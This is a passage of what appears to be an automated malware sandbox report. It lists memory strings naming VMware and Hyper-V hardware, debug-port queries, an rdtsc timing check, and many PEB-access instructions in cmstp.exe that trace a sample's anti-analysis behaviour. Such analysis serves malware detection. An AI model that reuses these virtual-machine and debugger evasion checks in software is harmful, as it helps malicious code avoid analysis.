          Source: explorer.exe, 00000014.00000000.330513195.0000000008A9D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}user
          Source: explorer.exe, 00000014.00000000.343866477.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000014.00000000.329728449.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000014.00000000.354895549.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000014.00000000.328359455.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000014.00000000.328359455.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000014.00000000.329728449.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000014.00000000.330513195.0000000008A9D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}AppData
          Source: explorer.exe, 00000014.00000000.328359455.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04530050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04530050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04597016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04597016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04597016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04519080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04593884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04593884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04537D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04553D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04593540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04519100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04519100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04519100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0459A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04544D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04544D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04544D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04534120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04542990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04541DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04541DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04541DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0453AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0455927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04515210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04515210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04515210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04515210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04533A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04548E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04528A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04554A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04554A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04558EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04542ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04542AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0454FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0452EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04543B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04543B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_0451DB60 mov ecx, dword ptr fs:[00000030h]
